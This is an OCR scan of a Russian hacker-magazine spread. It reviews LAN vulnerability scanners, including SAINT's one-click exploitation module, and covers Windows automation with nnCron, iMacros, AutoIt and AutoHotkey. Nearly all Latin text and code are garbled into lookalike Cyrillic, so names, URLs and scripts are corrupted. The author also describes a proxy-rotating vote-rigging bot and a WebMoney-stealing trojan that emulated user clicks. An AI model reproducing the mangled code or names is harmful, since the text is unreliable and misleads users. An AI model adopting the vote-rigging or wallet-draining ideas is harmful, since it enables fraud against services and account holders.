сканера постигло меня сразу после запуска. Установщик 
последней версии, выругавшись, сказал, что запустить 
Ребпа на ѴѴіпсІоѵѵз 7 или ѴѴіпсІоѵѵз Бегѵег 2008 Н2 на 
текущий момент нельзя. Не очень-то вежливо, при- 
шлось открывать виртуальную машину, но я-то знал: 
оно того стоит. Небпа — один из лучших сканеров, кото- 
рый определяет и анализирует хосты локальной сети. 
Физические и виртуальные серверы, рабочие станции 
и ноутбуки, маршрутизаторы и аппаратные брандмауэ- 
ры — Ребпа представит полный список подключенных 
к сети устройств, выведет информацию о беспроводных 
сетях. Каждый из них она всячески будет пытать в поиске 
хоть какого-то намека на уязвимость, и делает это очень 
шустро. На сканирование локальной сети класса С уходит 
примерно 15 минут. Продукт Ребпа определяет уязвимо- 

ВЕБ- МОРДА СКАНЕРА 5АІЫТ 
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сти ОС, приложений, потенциально опасные настройки и 
параметры. В результате можно получить обзорный план 
сети с отображением потенциально уязвимых мест. База 
с уязвимостями, по заверениям разработчиков, обновля- 
ется ежечасно, а информация об уязвимости попадает в 
базу не позднее 48 часов после появления о ней первого 
бактрака. Впрочем, сам факт, что это продукт фабрики 
еЕуе, уже является своего рода гарантией качества. 

МісгозоН Вазеііпе Бесигііу 
Апаіугег <— 

ѵѵѵѵѵѵ. т і с го 5 оД . с о т 

Ргеееѵѵаге 

ѴѴІп 

Что это такое? Анализатор безопасности от компании 
МісгозоЙ, который проверяет компьютеры в сети на 
соответствие требованиям Місгозоіф которых набралось 
немалое количество. Самый главный критерий — это, 
конечно же, наличие на системе всех установленных 
обновлений. Не надо напоминать, что сделал Сопбскег, 
используя брешь М508-67, патч для которой вышел за 2 
месяца до эпидемии. Помимо отсутствующих в системе 
патчей, МВ5А обнаруживает и некоторые распростра- 
ненные бреши в конфигурации. Перед началом скани- 
рования программа скачивает обновления для своих 
баз, поэтому можно быть уверенным: Місгозоіі: Вазеііпе 
Зесигііу Апаіугег знает все о вышедших апдейтах для 
винды. По результатам сканирования (домена или диа- 
пазона ІР-адресов] выдается сводный отчет. И без того 
наглядный репорт можно перенести на условную схему 
сети, отобразив результаты сканирования в Ѵізіо. Для 
этого на сайте программы доступен специальный соеди- 
нитель, который отобразит символами различные узлы 
локалки, заполнит параметры объектов, добавив туда 
информацию о сканировании, и в удобнейшей форме 
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позволит посмотреть, какие проблемы есть на 
том или ином компе. 

5АІЫТ 

ѵѵѵѵѵѵ. за і пісо гро гаіі о п .со т 

ЗНагеѵѵаге 

піх 

Всего лишь два ІР-адреса, на которые ты 
сможешь натравить 5АІІЧТ в течение триаль- 
ного периода, жестко зашиваются в ключ, 
и он отправляется тебе на е-мейл. Ни шагу 
влево, ни шагу вправо — но этот продукт обя- 
зательно стоит попробовать, даже с такими 
драконовскими ограничениями. Управление 
сканером реализуется через веб-интерфейс, 
что неудивительно — решения 5АІКІТ про- 
даются, в том числе, в виде серверов для 
установки в стойку (БАІІЧТЬох], а тут нужно 
следовать моде. С помощью аскетичного веб- 
интерфейса очень просто можно запустить 
тестирование и использовать многолетние 
наработки для поиска потенциально уязви- 
мых мест в системе. Скажу больше: один из 
модулей ЗАІІЧТехрІоіІ: позволяет не только 
обнаружить, но еще и эксплуатировать уязви- 
мость! Возьмем пресловутую ошибку М508- 
67. Если сканер обнаруживает неприкрытую 
дырку и знает, как ее эксплуатировать, то 
прямо рядом с описанием уязвимости дает 
ссылку с близким сердцу словом ЕХРБОІТ. В 
один клик ты получаешь описание сплоита 
и, более того, — кнопку Пип ІЧоѵѵ для его 
запуска. Далее, в зависимости от сплоита, 
указываются различные параметры, напри- 
мер, точная версия ОС на удаленном хосте, 
тип шелла и порт, на котором он будет запу- 
щен. Если эксплуатирование цели удачно 
завершено, то во вкладке Соппесбопз модуля 
ЗАІІЧТехрІоіІ: появляется ІР-адрес жертвы и 
выбор действий, которые стали доступными 
в результате запуска эксплоита: работа с 
файлами на удаленной системе, командная 
строка и т.д! Представляешь: сканер, кото- 
рый сам ломает! Недаром слоган продукта: 
«Ехатіпе. Ехрозе. Ехріоіі». Система проверок 
самая разнообразная, причем в последней 
7-й версии появился модуль для пентеста 
веб-приложений и дополнительные возмож- 
ности для анализа баз данных. Обозначив 
цель через веб-интерфейс, можно наблюдать 
за действиями сканера со всеми подробно- 
стями, точно зная, что и как сканер делает в 
текущий момент. 
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Х-5САЫ УМЕЕТ ПОДКЛЮЧАТЬ ПЛАГИНЫ ЫЕ551І5 



Последняя версия этого сканера вышла еще 
в 2007 году, что вовсе не мешает использо- 
вать его сейчас благодаря системе подклю- 
чаемых плагинов и скриптов, написанных на 
языке ІЧА5Е, таком же, который используется 
в ІЧеззиз/ОрепѴАБ. Найти и отредактиро- 
вать имеющиеся скрипты несложно — все 
они находятся в папке зсгіріз. Для запуска 
сканера необходимо обозначить параметры 
сканирования через меню Сопбд Зсап 
Рагатеіюг. В качестве объекта сканирования 
может выступать как конкретный ІР, так и 
диапазон адресов, но в последнем случае 
надо быть морально готовым к тому, что 
тестирование будет длительным. Сканер, 
увы, не самый быстрый. На скорость про- 
порционально влияет и количество подклю- 
ченных модулей: дополнения, проверяющие 
стойкость паролей для 55Н/ѴІЧС/ЕТР, одни из 
самых прожорливых. Внешне Х-5сап больше 
напоминает самоделку, созданную кем-то 
для собственных нужд и пущенную в паблик 
на свободное плавание. Возможно, он бы 
и не получил такой популярности, если не 
поддержка скриптов ІЧеззиз, которые акти- 
вируются с помощью модуля ІЧеззиз-АНаск- 
Зсгіріз. С другой стороны, стоит посмотреть 
отчет о сканировании, и все сомнения в 
полезности сканера отходят на второй план. 
Он не будет оформлен по одному из офици- 
альных стандартов ИБ, но точно расскажет 
много нового о сети. 

Карій 7 ИеХрозе 

ѵѵѵѵѵѵ.гарісІ7.сопп > 

Ргеееѵѵаге-версия 

піх/ѴѴІп 

ПарісІ 7 — одна из самых быстро расту- 
щих компаний, специализирующихся 
на информационной безопасности, 
в мире. Именно она недавно приоб- 



рела проект М еІіазрІоИ: Егатеѵѵогк, и 
именно ее рук дело — проект ІЧеХрозе. 
Стоимость «входа» для использования 
коммерческой версии составляет без 
малого $3000, но для энтузиастов есть 
Соттипі1:у-версия с чуть-чуть урезан- 
ными возможностями. Такая бесплат- 
ная версия легко управляется через 
веб-интерфейс, а также интегрируется 
с МеІазрІоіСом (нужна версия не ниже 
3.3.1]. Схема работы достаточно хитрая: 
сначала запускается ІЧеХрозе, далее 
Меіазріоіі: Сопзоіе (тзкопзоіе), после 
чего можно запускать процесс сканиро- 
вания и настраивать его с помощью ряда 
команд (пехрозе_соппесС пехрозе_зсап, 
пехрозе_бізсоѵег, пехрозе_боз и дру- 
гие). Прикольно, что можно совмещать 
функциональность ІЧеХрозе и других 
модулей Меіазріоіі’а. Самый простой, но 
действенный пример: искать компьютеры 
с некой уязвимостью и тут же эксплуати- 
ровать ее с помощью соответствующего 
модуля Меіазріоіі: — получаем авторутинг 
на новом качественном уровне, нс 
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НЕСКОЛЬКО ПРИМЕРОВ ТОГО, КАК ОБЛЕГЧИТЬ 
СЕБЕ ЖИЗНЬ 



ПОПРОБУЙ ПОСЧИТАТЬ, СКОЛЬКО ВРЕМЕНИ У ТЕБЯ УХОДИТ ВПУСТУЮ НА ВЫПОЛНЕНИЕ ОД- 
НИХ И ТЕХ ЖЕ ДЕЙСТВИЙ. НЕПРОСТАЯ ЗАДАЧА? ЗАТО АВТОМАТИЗИРОВАТЬ ЧАСТЬ РУТИННОЙ 
РАБОТЫ МОЖНО ЗАПРОСТО. И БЬЮСЬ ОБ ЗАКЛАД, ТАКАЯ РУТИНА ЕСТЬ У КАЖДОГО. 



Ч тобы не быть голословными, разберем 
несколько конкретных задач, отыскав 
для их решения подходящие утилит ы. 
Ксчастью, под виндой с помощью всего 
двух-трех утилит можно автомати- 
зироватьабсолютно все и легко эмулировать 
действия пользователя. Итак, первая задачка. 

ЗАДАНА: 

Отслеживать активность работы пользователя 
и в периоды простоя выполнять ресурсоемкие 
задачи. 

РЕШЕНИЕ: 

Нет ничего лучше, чем загрузить компьютер 
выполнением какой-то ресурсоемкой опе- 
рации в тот момент, когда это нас никак не 
побеспокоит, а именно, когда за компьютером 
никого нет. Такая возможность, кстати, есть у 
некоторых прогрессивных продуктов: тот же 
ІМоііоп Апбѵігиз имеет функцию ІсІІе 5сап и 
очень четко выполняет полное или частичное 
сканирование системы в момент отсутствия 
пользователя. Или вот другой полезный 
пример — чтобы торрент-клиент не мешал 
серфингу, предоставлять ему максимальную 
ширину канала, когда за компьютером никто 
не работает. Попробуем реализовать это на 
примере иТоггепІ [ ѵѵѵѵѵѵ.иЬггепІ.сопп ]. Тут надо 
сказать, что в самом клиенте не так давно 



появилась такая возможность в виде опции 
ТОР Раіе Сопігоі, позволяющей подстраивать 
скорость ТСР-соединений клиента так, чтобы 
его работа не мешала другим приложениям. 
Мало этого, когда-то давно я устанавливал 
специальный сРоз-драйвер, с помощью кото- 
рого можно было задать низкий приоритет для 
торрента, а высокий — для браузера. Однако 
ценность нашего примера именно в том, чтобы 
обработать событие, когда компьютер находит- 
ся в ісііе-режиме (т.е. ничего не делает), и от 
этого уже плясать. 

Проще всего отслеживать появление в памяти 
процесса скринсейвера и в этот момент запу- 
скать іКоггепі и, наоборот, когда его процесс 
выгружается из памяти, закрывать иіюггепі В 
нашем давнишнем материале про автомати- 
зацию мы уже рассказывали тебе о замеча- 
тельной программе ппСгоп [ ѵѵѵѵѵѵ.ппсгоп.ги і. 
Этот уникальный планировщик задач не только 
умеет запускать процессы по расписанию, но 
и способен отслеживать файлы, флаги, окна, 
процессы, движения мыши, время простоя 
компьютера, клавиатурные шорткаты, выход в 
онлайн/оффлайн, появление диска в драйве, 
наличие хоста в сети (пинг), изменение уда- 
ленного ресурса по ЬМр- прото колу, количество 
свободного места на диске, загруженность 
оперативной памяти и многое другое. Вводную 
часть по использованию программы мы опу- 



стим (но обязательно положим на диск РОГ 
статьи «Пусть он все делает сам!» со всеми 
подробностями) и сразу приступим к делу. 
Главный наш помощник — функция ѴѴаІсЬРгос, 
которая отслеживает состояние процесса 
в памяти. Как только в памяти появится 
зсгпзаѵе.зсг (наш скринсейвер), с помощью 
5ТАРТ-АРР мы запустим приложение: 

# ( ТоггегШ_зРаП: 

АзЬоддесШзег 

ЬоасІРгоіііІе 

ІІзег: «изегпате» ЗесРаззілгогсІ: 
«раззЪазЬ» Ботаіп: «БОМАШ» 
БодопІпБегасШіѵе 
ШаСсЬРгос : «зсгпзаѵе . зсг» 

Киіе : РКОС-ЕХІЗТ : «иТоггепР . ехе» 
ШТ 

АсРіоп : 

ЗРагРІп: «С:\Ргодгат Рі1ез\ 
иТоггепР» 

ЗЬоѵШогтаІ БогтаІРгіогіРу 
3 ТАКТ- АР Р : С:\Ргодгаш Рі1ез\ 
иТоггепР\иТоггепР . ехе 
)# 

И напротив, когда процесс выгрузится из 
памяти, то закрываем и окно иіоггепГа: 

# ( ТоггепР_зРор 



► ОЗО 
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ПАРАМЕТРЫ ЫЫСРОЫ 



АзЬоддесШзег 

ШаСсЪ-РгосЗСор : «зсгпзаѵе . зсг» 

АсСіоп : 

МШ-ТЕКМШАТЕ : " *ТоггепС * " 

)# 

Надо учитывать, что некоторые программы 
блокируют запуск скринсейвера (например, 
медиа-проигрыватели], поэтому для чистоты 
эксперимента необходимо мониторить и эти 
процессы. В качестве альтернативы можно 
отслеживать именно простой компьютера: 
в ппСгоп для этого есть событие ЮІ_Е. При 
этом процесс иТоггепПа можно не закрывать, 
а изменять для него параметры максимально 
полосы пропускания. Для последнего пона- 
добится включить в настройках клиента веб- 
интерфейс и, поэкспериментировав с нужными 
параметрами, понять, как составить нужный 
НТТР-запрос для управления скоростью 
загрузки. 

ЗАДАНА: 

Автоматизировать любые действия в брау- 
зере, которые обычно приходится выполнять 
вручную. 

РЕШЕНИЕ: 

У каждого есть набор онлайн-сервисов или 
просто информационных ресурсов, кото- 
рые он посещает. Создание закладок или 
объединение их в группы для одновременного 
открытия — самый простой способ облегчить 
себе жизнь. Увы, он не решает проблемы с 
необходимостью ручной авторизации, а также 







■иг.!ы ПІМАПР 




СКРИПТ ДЛЯ УПРАВЛЕНИЯ 
ІІТОРКЕЫТ 



вводом некоторых нужных параметров (ска- 
жем, для локального поиска на сайте]. К тому 
же, далеко не любую страницу можно добавить 
в закладки из-за особенностей сайта. В итоге, 
мы раз за разом выполняем одни и те же 
действия, чтобы добраться до нужной части 
сайта или одним и тем же способом восполь- 
зоваться онлайн-сервисом. Приведу пример 
из жизни. Мне достаточно часто приходится 
ездить на поездах в двух-трех направлениях, 
и, чтобы сэкономить время, я покупаю билеты 
онлайн на сайте ггсі.ги (тут хочется прокричать 
трижды «Ура» по поводу того, что у нас вообще 
есть такая возможность]. Но чтобы перейти 
к покупке билета, необходимо сначала зайти 
на недавно обновленный сайт РЖД, выбрать 
пункт «Купить билет», после чего попасть на 
старый сайт компании, откуда в свою очередь 
нажать на «Вход для зарегистрированных 
пользователей», ввести на отдельной страни- 
це логин и пароль (сессия не сохраняется в 
целях безопасности]. После авторизации опять 
подтвердить, что хочешь купить билет, выбрав 
в меню пункт «Покупка билета», проскроллить 
страницу с регламентом работы онлайн- 
сервиса, подтвердить согласие установкой 
галочки — и только затем попасть на страницу 
для ввода станции отправления и назначе- 
ния, количества пассажиров и даты поездки. 
Причем все, кроме даты, у меня, как правило, 
неизменно, поэтому и эти данные я ввожу на 
автомате. Клик-клик-клик — каждый раз одно 
и то же. Ждать, пока РЖД наймет специали- 
стов по юзебилити, можно до пенсии, поэтому 
все описанные действия я поручил специ- 
альному плагину для Рігеіюх/ІЕ — іМасгоз 
( ѵѵѵѵѵѵ.іориз.сопп/ітасгоБ ]. 

Как заставить выполнять его нужные дей- 
ствия? Просто показать, что нужно делать. В 
браузере после установки появится специ- 
альная панель со списком существующих 
сценариев, а также тремя вкладками, с 
помощью которых осуществляется создание и 



іМасгоз 



*|(р Избранное 

м* Оето-АгсНіѵеРаделІт 
Оето-Ооѵѵпіозсі.ііт 
«** □ето-ЕхЬгасІ.ііт 

Оето-ЕхІгасІАпсІГііиіт 
л* Оето-ЬЛгасіЯеІаІіѵе.ііт 
т* Рето-ЕхІгасІІЖІліт 
** Оето-РШРогтлІт 
Рето-Ріііегліт 
□ето-Ргателіт 
Оето^аѵазсгірі-Оіаіодзл,,. 
Рето- Ьоо р-Сзу^’УУе Ь.Пт 



4ГІ 

Мі 



Вослр* Запись [ Редакг. 




Повторить макрос 
Текущий: Мэкс: 

3 



Боспр* (Цикл) 



& 



ЖЛаггпс 

ііѵісэиі иь 

АЬоігі ІМасгоз 



ПАНЕЛЫМАСК05 



редактирование макросов. Все, что потребо- 
валось для решения моей задачи, перейти на 
вкладку «Запись», выбрать пункт «Записать», 
проделать все действия, которые я ранее опи- 
сал, нажать на «Стоп» и далее добавить свой 
макрос в систему кнопкой «Сохранение». При 
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РЕДАКТОР ДЛЯ РЕДАКТИРОВА- 
НИЯ МАКРОСОВ 



этом сам плагин записывает каждое действие 
на своем псевдоязыке: 

ѴЕК8ІСЖ В1ЛЬБ=62512 04 КЕСОКБЕК=ЕХ 
ТАВ Т=1 

ШБ СОТОАЬБДр : //ггсі. ги/ 

ТАС РОЗ=1 ТУРЕ = А 

АТТК=ТХТ : Купить<ЗР>билет 

ТАС РОЗ=1 ТУРЕ=А АТТК=ТХТ : Вход<8Р> 

для<8Р>зарегистрированных<8Р>пользо 

вателей<8Р»> 

ТАС РОЗ=1 ТУРЕ-ІБРІІТ : ЗБВМІТ 
ЕОЕМ=ЫАМЕ : ЬодіпЕогш 

Это лишь первые несколько строчек полу- 
чившегося скрипта. Теперь я просто выби- 
раю макрос «Билет Москва-Питер» и сразу 
перехожу к выбору даты и оплате :). Какие 
возможности это предоставляет? Огромные! 
Меня недавно спросили, как автоматически 
собирать ѴѴеЬтопеу-бонусы — небольшие 
поощрения в ѴѴМП/ѴѴМ2, которыми раз- 
личные ресурсы стимулируют пользователей 
для регистрации и как можно более частого 
посещения (как правило, это онлайн-казино]. 
Для получения бонуса необходимо зареги- 
стрироваться и авторизироваться, после чего 
найти нужный раздел и попросить бонус, 
кликнув на ссылку — варианты разнятся, но 
макрос реально сделать для любого из них. 
Если ѴѴМ-поощрения выдаются каждый день, 
то можно без проблем собирать их ежедневно, 
лишь однажды написав нужные сценарии. 
Тут-то и начинаешь ощущать всю прелесть 
ІМасгоз: скажем, для сайта на Еіазб'е уже 
не получится написать в скрипте «на этой 
странице перейти по такому-то линку». АиЫі: 
ничего не знает о структуре интерфейса на 
ЕІазЬ, но зато умеет распознавать конкретные 
участки сайта по их изображению с помощью 
плагина Ітаде Ресодпіііоп. А, значит, все, что 
ты можешь сделать вручную через Рігебох, 
можно автоматизировать через макросы с 
помощью этого замечательного плагина. 

Еще большей гибкости можно добиться, 
объединив возможности ІМасгоз и какого- 
нибудь языка программирования, который 
будет управлять логикой выполнения макроса. 
К счастью, программные интерфейсы іМасгоз 
могут быть вызваны из многих языков про- 
граммирования. Когда передо мной стояла 
задача оперативно написать накрутчикдля 
непутевого голосования, то я написал для 
іМасгоз сценарий для быстрой смены прокси 
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ДОБАВЛЯЕМ НОВОГО ІШІэіО- 
ВАТЕЛЯ С ПОМОЩЬЮ СКРИПТА 
АІІТОІТ 



«ЗѵѵіІсЬ Ргоху» и без проблем вызывал его из 
кода на РуШоп: 

ітрогБ тп32сот. сІіепБ 
сіе! Неііо ( ) : 

ітрогБ ѵ\п_п32сот. сііепр 
м=ѵ\гіп32сот. сііепр . 

БізраБсЪ. ( " ітасгоз " ) 
ѵѵ. іітіпіс ( " " , 1 ) 
ѵѵ. іітРІау ( " 8ш_ СсЬРгоху " ) 

і! пате == ' таіп 

Неііо () 

Но как ни приятно упростить себе жизнь 
в Сети, гораздо полезнее может оказаться 
автоматизация действий просто в системе. 

И для этого нужен уже совершенно другой 
инструмент. 

ЗАДАНА: 

Эмулировать любую активность пользователя 
в системе. 

РЕШЕНИЕ: 

В одном из номеров ц-ц мы демонстрировали 
простую схему, как может работать троян, 
способный уводить деньги с электронного 
кошелька ѴѴеЬтопеу (хочу напомнить, что 
использование подобного софта — самый 
простой способ угодить в лапы компетентных 
органов). Фокус заключался в использовании 
АРІ-функций, с помощью которых эмулирова- 
лись последовательность кликов и нажатий 
пользователя. В результате, после запуска 
кипера автоматически открывалось окно для 
перевода денег, в поле с номером кошелька 
вводился номер злоумышленника, а после 
распознавания капчи нажималась кнопка, 
одобряющая перевод. В общем, точно так же, 
как если бы пользователь сам перевел все 
деньги на чужой счет. Использование С++ 
вкупе с АРІ-функциями — это, безусловно, 
мощнейший механизм для подобных дел, 
однако, для эмуляции работы пользовате- 
ля есть решение гораздо проще и подчас 
даже эффективнее. Я говорю об АиІоИ ( ѵѵѵѵѵѵ. 
аиіоБзсгірЕсот/аиІюііЗ ) — специальном языке, 
созданном для простой автоматизации задач 
под виндой. 

В ранних версиях программа преимуществен- 
но использовалась для создания макросов, 



полезных для выполнения часто повторяю- 
щихся задач, таких как инсталляция идентич- 
ных наборов программ на большое количество 
компьютеров. Позже АіЛоІІ: серьезно преоб- 
разилась, предоставив возможность создавать 
полноценные 0111-интерфейсы, а сами скрип- 
ты компилировать в исполняемые ЕХЕ-файлы, 
которые запускаются на любой системе, даже 
без установленной Аиіоіі. Для эмуляции рабо- 
ты пользователя особенно важен перехват 
и эмуляция клавиатурных нажатий и кликов 
мышки. При этом скрипты обладают всей той 
мощью, которая нужна для автоматизации. 
Макросы могут работать с протоколами 1ЮР 
и ТСР, изменять значения реестра, работать 
с файлами и буфером обмена, а также запу- 
скать консольные приложения, имея доступ 
к стандартным потокам ввода/вывода. Есть 
и функциональность, частично дублирующая 
іМасгоз, позволяя автоматизировать работу в 
браузерах (ІЕ, Орега, Еігеіюх]. Более того, как 
из обычных языков программирования, можно 
обращаться к СОМ-объектам, запускать функ- 
ции из динамических библиотек (в том числе, 
АРІ ѴѴіпсІоѵѵз], а также работать с базами 
данных МуЗОБ и ЗОБіІе. Короче, прога пре- 
вратилась в настоящий язык программиро- 
вания с упором на автоматизацию различных 
процессов. 

Простой вопрос: что можно автоматизировать 
через Аиіоіі? Абсолютно все. Для примера 
составим скрипт, который будет запускать 
оснастку Сотриіег Мападетепі: и через нее 
создавать локального пользователя. Конечно, 
то же самое можно (и даже лучше] провернуть 
средствами РоѵѵегЗЬеІА, но пример важен с 
точки зрения демонстрации возможностей 
Аиіоіі. Для комфортной работы с макросами 
в комплект АиЬ II входит классный редак- 
тор кода, в котором реализованы подсветка 
синтаксиса, автодополнение команд и даже 
отладчик. Весь ряд действий макроса задает- 
ся в виде вполне понятных команд, опираю- 
щихся на название окон и элементов интер- 
фейса (скрипт для английской ѴѴіпсІоѵѵз ХР], 
плюс эмуляции клавиатурного ввода юзера: 

$СгееіСет = "СотриСег МападетепБ 
(Босаі) I ЗузБет Тооізі Босаі Бзегз 
апсі Сгоирз" 

$изегпаше = "изегБосгеаБе" 

Кип ( ' стсі /с " сотртдтБ .тзс" 1 , @ 
ЗузБетБіг, @ЗШ_НІБЕ) 

Ш_пШіБАсБіѵе ( "СотриБег 
МападетепБ " ) 



СопСгоІТгееѴіем ("СотриБег 
МападетепБ" , " " , 12785 , "Ехрапсі" , 

$БгееіБет) 

$БгееіБет = $БгееіБет & " | Бзегз" 
СопБгоІТгееѴіечл (" СотриБег 
МападетепБ " , 127 85, " ЗеІесБ", 

$БгееіБет) 



► 032 
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іпкепХіХАи^сНоІке/.аЬк * Аи{оНс*кеу ѵі .0^6-05 



Іміе Ѵіе* Неір 



ѴѴіжіоіш: С:\и5ег5.\йіер\Оос(лтіеіііа\АиічНсіІкеу.аЬк - АиІиНиІкеу ѵі, 0.48.05 
КеуЬіІ Ьоак: па 
Мои&е І’міюк: по 
ЕпаЫегі ТІтегн: 0 аі 0 0 
Іггіегпіріегі Ш геясіа: О 
Раизегі іГігеаЛв: 0 о Г 0 |0 І аусгз| 

Мп(Жіег5 (Се(Кеу$іэ1е0 поЦ = 

Мойіііегз [Ноок'з ЕодісаІІ = 

Мпгііііргв (Ноок'з РЬузісаІ) = 

Ргеііх кеу із йоѵ/п: по 

ЙОТЕ: ОпІуіЬе зсгірГз оѵп кеуЬозпІ еѵепСз аге зЬсѵлп 
[поиііе иэег’з), Ьесаизе Оіе кеуЬоагЛ Гм о к Івп'І іпзіаііегі. 

МОТЕ: То сЙзаЫе Ше кеу Шзиогу зіюмл Ьеіош, асій ІІіе ІІпе 'ЖеуНізІогу СГ апуѵЛіеге іп іЬе зсгірі. ТНе зате 
тсіііогі сап Ье изсгі Ю сЬапде «На ніге пННе Ьізіогу ЬиНег. Рог ехатріе: ЯКеуНізМгу 100 (ОаГаиІІ із 40, Мах із 
500] 

ТЬе оІЙез) вге ИзГеі) (іге(, ѴК=Ѵіг1ияІ Кеу, 8С=5свп Сойе, ЕІарзесГ^Зесапгіз &іпсе (Ке ргеѵіаиз еѵеп*, Тур ее: 
Іі-Ноок Ноікеу, з=Бирргеззей |Ыоске<1], 1-Ідпогей Ьесаизе Нмаз депегаіееі Ьу ап ДНК зсгір*, а=Агіі11сІаІ, 
Я^ОіааЫес) ѵіа ЙІІѴѴіпАсІіѵе/ЕхізІ, 



ѴК 8€ Тура Ур/Оп ЕІарзегі Кау 



ѴѴіпгіолѵ 



Ргезз |РВ] іо геГгезІі. 





ДіЯОЙ МмлЭ бММИ* V 021 Ьс!в 



И на оо □ е? о а* □ 



;™ Айк Мкф &г*тѵ ѵ «і ы* - 
ЭД ы МпПЫШгіЬ* и . *> 

й*іТИйГПрк-л 
&мвмОйіГЛ»м'-'’.'&іімй1 
>-«™ ч ткыіѵіодмз; 

ЙАй ГОмГС . ''ЛІита '*4^\ЛйЛаѴАіЛт^^ М* - «■' ’ . ’С*і»ПІ 

і'і'оѴѴ^Г СІ#НГ-#т» •ЗМСГотУМ ' ЛЪп *Х*1 » Р ЙЖИ 1**»Т 

^тШГеіанпн^ оймеъ цмьѴВшкиП 

Іок ьдосйі -и ТтеЬвВДгаЬтж» 

Ц4КШИ4І ЧЖЧЧ"І 



КОНСОЛЬАІЯОНОТКЕѴ 



Зепсі ( " {АррзКеу} {Боѵѵп} (ЕпСег } " ) 
СопкгоІЗе ій ( "Беѵѵ ІІзег " , " " , 

"Ейі'ЬІ" , $изегпате) 

СопСгоІСІіск ( "Ыем ІІзег , 117 0) 
СопкгоІСІіск ( "Ыеѵѵ ІІзег " , " " , 2) 

Зіеер (3000) 

Зепсі ("{Так}") 

С помощью функции Рип(] запускается оснаст- 
ка, ѴѴі п ѴѴа і п АсТіѵе () дожидается появления 
окна, СопІгоІТгееѴіеѵѵО используется для 
навигации по дереву, а ЗепсіО эмулирует ввод 
с клавиатуры. Теперь дополним скрипт про- 
веркой, создался пользователь или нет: 

$гези1к = СопкгоІЬізСѴіеѵ^ 

( "Сотрите г МападетепС" , " " , 

" ЗузЬізСѴіе^321 " , "ЕіпсІІкет " , 
$изегпате) 

ѴІіпСІозе ("Сотрикег МападешепС " ) 



все твои клики и набор на клавиатуре в код для 
АіЛоІТ Для упрощения разработки графических 
интерфейсов существует визуальный редактор 
форм Косіа РогпгЮезідпег [коба.багкбозТги ] 
с интерфейсом аналогичным ОеІрЫ ЮЕ. Если 
ты использовал программу ѴізІитЫег (ѵѵѵѵѵѵ. 
ѵізІитЫег.пеі ] — первый стамблер под Ѵізіа/ 

ѴѴ 7, сканирующий ѴѴі-Рі эфир и отображающий 
информацию о найденных точках доступа с при- 
вязкой по 0Р5 — 

то знай: она как раз полностью написана на 
Аиіоіі: и преобразовывает консольный вывод 
стандартной утилиты винды в графический вид! 
К числу слабых мест Аиіоіі: можно было бы отне- 
сти необходимость изучения нового языка, но и 
здесь есть выход: функции АіЛоІІ: интегрируются 
в более мощные языки программирования. 

ЗАДАНА: 

Назначить на одну «горячую клавишу» 
последовательность действий. 



гі*ми*га«=№Ыг і рьп іси ущсмл г кои а 

АІІТОІТ МАСКО 6ЕЫЕКАТ0Р — 
АВТОМАТИЗИРУЕМ СОЗДАНИЕ 
МАКРОСА:) 



#і : :Кип, %А_РгодгатЕі1ез%\ѴІіпЗСР\ 
ѴІіпЗСР . ехе 

Символ # в данном случае обозначает кла- 
вишу <ѴІіпсіо'^з>, а запуск программы 
осуществляется с помощью функции Рип. 
Если на хоткей ты хочешь назначить 
несколько действий (а именно это нам и 
нужно], следует использовать более слож- 
ный синтаксис: 

ІюСкеу: : 
действиеі 
действие2 
гекигп 

Перед конструкцией можно также обозначить 
условия, с которыми будет выполняться хот- 
кей. Скажем, если ты хочешь, чтобы «горячая 
клавиша» работала только в конкретном при- 
ложении, то для этого с помощью директивы 
#іШіпАскіѵе необходимо указать тип и 
названия окна (оба параметра можно узнать 
с помощью утилиты Асбѵе ѴѴіпбоѵѵз I пбо]. Наш 
следующий хоткей работает только в Еігеіох’е, 
вызывает меню «Тооіз» (с помощью встроен- 
ной «горячей клавиши» Рігебох <А1к-с>] и 
затем открывает окно «Орбопз». 



Іі: $гези1к о -1 Тйеп 

МздВох (0, "ТезС гезиік" , 

" Зиссезз" ) 

Еізе 

МздВох (0, "ТезС гезиік" , 
"Еаііесі" ) 

Епкіг 

После чтения списка локальных пользователей 
закрываем окно с помощью функции ѴѴіпСІозеО 
и выдаем результат проверки на экран. В целях 
упрощения написания скриптов для эмуляции 
аетивности пользователя в комплекте с про- 
граммой идеттулза АиІоМ; ѵЗ ѴѴіпбоѵѵ Іпіо, кото- 
рая отображает множество полезных данных о 
выбранном окне. Есть и еще более полезные 
инструменты. Чтобы не писать макросы вручную, 
а просто записать свои действия и получить 
готовый макрос, можно воспользоваться допол- 
нительными утилитами: АиІоІіМасгобепегаІог 
или ЗсгіріѴѴгіІег. Обе выполняют одни и те же 
действия и в реальном времени преобразуют 



РЕШЕНИЕ: 

Несмотря на свое название, программа 
ДиіоНоікеу [ ѵѵѵѵѵѵ.аиІоЬоІкеѵ.сопп ] представ- 
ляет собой намного больше, чем просто 
инструмент работы с «горячими клавишами». 
Эмулируя ввод с клавиатуры, движения мыш- 
кой и опираясь на события ѴѴіпбоѵѵз, можно с 
помощью произвольной «горячей клавиши» 
автоматизировать последовательность из 
десятка различных действий. Настройка хот- 
кеев осуществляется с помощью текстового 
конфига, для работы с которым разработчики 
предлагают работать с помощью текстово- 
го редактора ЭсіТЕДАиІюНоікеу (скачай с 
официального сайта]. Идея хорошая: с под- 
свеченным синтаксисом и автодополнением 
команд и констант задача упрощается в разы. 
Общий синтаксис для обозначения «горячей 
клавиши» — «хоткей -действие». Например, 
чтобы запускать программу ѴѴіпЭСР с помо- 
щью <ѵ/іп-і>, необходимо добавить в конфиг 
Строку: 



#іШіпАскіѵе аЬк_с1азз 
МогіІІаБШіпсІсжСІазз 

#о : : 

Зепсі {А1к}к 
ЗІеер 100 
Зепсі о 
гекигп 
#ІШіпАскіѵе 

В некоторых случаях, чтобы не писать весь код 
скрипта вручную, выручит специальный тасго 
гесогбег — аналогичный АиІоЗсгіріѴѴгіІег для 
АиІоІЕ С помощью Ресогбег Ьу Тііап ( ѵѵѵѵѵѵ. 
аиЩбо1кеѵ.сотЛогитЛоріс23671 .Ыті ] можно 
записать операции с окнами, действия с кла- 
виатуры, движения мышью, паузы — словом, 
полностью записать все свои действия на 
скриптовом языке. Скрипты обычно оформля- 
ются в файлы с расширением .аЬк, но, благо- 
даря встроенной тулзе, их можно преобразо- 
вать в самостоятельный ехе-файл и запускать 
на любом компе, т 
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РС 20ЫЕ 



СТЕПАН «СТЕР »ИЛЬИН ВТЕРШСЮ-КУІ 



Кодинг 



4:00* 1|? СаІІ 



Пишем Віиеіооііі-сканер 
для МОКІА N900 

